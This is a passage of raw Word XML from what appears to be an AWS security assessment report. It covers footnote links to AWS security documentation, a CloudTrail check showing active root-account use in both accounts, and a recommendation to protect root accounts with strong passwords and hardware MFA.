            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://aws.amazon.com/security-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>hub/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>138</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="58"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId208">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/config/latest/developerguide/security-best-practices.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>139</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId209">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/guardduty/latest/ug/what-is-guardduty.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>140</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId210">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://aws.amazon.com/macie/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>141</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId211">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/inspector/v1/userguide/inspector_introduction.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>142</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId212">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.terraform.io/use-cases/infrastructure-as-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>code</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ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>EC2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:hyperlink r:id="rId213">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/cloudtrail/home?region=us-east-1#/ev</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId213">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>ents?Username=root&amp;CustomTime=7776000000</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Adjust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>filters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>attribute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>adequate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>timespan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>performed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>logged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487620096">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1931771</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>43203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4361985" cy="3581019"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="87" name="Image 87"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="87" name="Image 87"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId214" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4361985" cy="3581019"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="85"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>292595537002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>during</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>last</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>months</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>actively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to protect AWS root accounts. This should be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accomplished</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>utilizing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a strong password and MFA, ideally a hardware-based MFA mechanism. These accounts should only be used occasionally, when it is not possible to perform a task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by other means. Additionally, if access keys need to be created to perform a certain task, they should be removed after the task is completed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>143</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="128"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487620608">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>242734</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="88" name="Graphic 88"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="88" name="Graphic 88"/>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9.112926pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15695872;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape72" coordorigin="1440,382" coordsize="2880,0" path="m1440,382l4320,382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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>143</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="61"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId215">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/accounts/latest/reference/best-practices-root-user.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</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BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is further</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>advised</w:t>
